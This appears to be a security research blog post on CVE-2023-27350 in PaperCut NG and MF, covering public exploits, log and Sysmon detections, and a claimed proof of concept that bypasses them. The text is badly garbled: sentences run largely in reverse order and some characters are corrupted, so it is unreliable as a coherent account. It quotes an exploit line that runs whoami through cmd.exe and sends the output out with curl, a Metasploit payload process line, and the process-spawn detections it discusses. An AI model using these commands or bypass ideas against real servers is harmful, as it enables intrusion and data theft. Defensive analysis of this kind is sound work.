![]() An attacker that doesn’t abuse this functionality won’t generate this particular log entries. The other three entries are all associated with attacking the scripting interface(s). But it's also generated by a normal admin user logging in. The first entry is generated by CVE-2023-27350 directly. User "admin" updated the config key “”Īdmin user "admin" modified the print script on printer ![]() Horizon3.ai noted variations of these entries as good indicators of compromise: User "admin" logged into the administration interface. Log File DetectionsĪttacking PaperCut NG and MF via the print scripting interfaces leaves very distinctive entries in the server’s log file. There are a whole slew of well-documented LOLBAS an attacker can abuse that would allow them to bypass these detections (as we’ll see later). Below is Meterpreter being started by pc-app.exe using java.exe (note the “spawn” logic in the Java Meterpreter). Already we’ve seen a PaperCut exploit that doesn’t wouldn’t trigger this detection. If pc-app.exe creates a child process called cmd.exe or powershell.exe then an attacker is exploiting PaperCut NG/MF. The Sysmon (or sysmon-esque) detections have been offered up by Huntress and Sophos. There have been three types of detections published so far. papercut 40671 /home/papercut/runtime/linux-圆4/jre/bin/java -classpath /tmp/~ metasploit.PayloadĮither way, both approaches trigger detections that’ve been shared among the security community, so let’s look at those more closely. The phrase “metasploit.Payload” literally appears in ps output. On Linux, where there is less likely to be any AV/EDR, the payload screams that it's malicious. As soon as it touches the disk, it’ll be removed. The Meterpreter jar is more or less unobfuscated and well-known to be immediately flagged by Windows Defender (among other AV). Unfortunately, while it sounds good on paper, the Metasploit attack is not great. This approach treats all victims equally. A Windows-only only attack is restricted to… only Windows victims. The Java-focused exploitation is useful because PaperCut NG and MF support Linux, Mac, and Windows. The loaded class will eventually drop a Meterpreter JAR to disk and execute it. Instead, it uses to load a remote Java class. The previously mentioned Metasploit module is interesting. The attacker cannot maintain execution in the engine itself they have to migrate to another process. Perhaps the main reason they didn’t establish a reverse shell is because the scripting engine has a five second timeout (see decompiled code below). exec ( 'cmd.exe /C \" for /F \" usebackq delims= \" %A in (`whoami`) do curl \" ' ) Horizon3.ai’s exploit uses the scripting interface to execute a single Windows command ( whoami) and sends the response back to the attacker via curl:. PaperCut Software implemented configuration options to lessen the risk of this arbitrary code execution vector, but since the attacker has full administrative access, those protections are easily disabled. ![]() The JavaScript engine is Rhino, which also allows that user to execute arbitrary Java. In both cases, the attacker abuses the system’s built-in JavaScript interface. Exploits that use the print scripting interface to drop a malicious JAR (see this Metasploit pull request).Exploits that use the PaperCut print scripting interface to execute Windows commands (variations on the Horizon3.ai exploit).Microsoft attributes attacks in mid-April to TA505.Īt the time of writing, two public exploit variants use CVE-2023-27350 and execute arbitrary code on PaperCut NG and MF: In this blog, we detail one such path and show how an attacker can avoid existing detections based on the defender's incorrect assumptions.īefore diving into the new code execution path, let’s look at the history of this vulnerability and survey the current exploits and detections that the security community has published. How did this happen? PaperCut NG and MF offer multiple paths to code execution. However, VulnCheck researchers have found a proof-of-concept exploit that bypasses all published detections from Huntress, Horizon3.ai, Emerging Threats and Microsoft. Multiple security organizations have published exploit detections and indicators of compromise that assume attackers are executing code through PaperCut’s built-in scripting interface. The exploited vulnerability would later be assigned CVE-2023-27350. In mid-April, attackers began exploiting a vulnerability in PaperCut NG and MF. Since attackers learn from defenders' public detections, it's the defenders’ responsibility to produce robust detections that aren’t easily bypassed.
0 Comments
Leave a Reply. |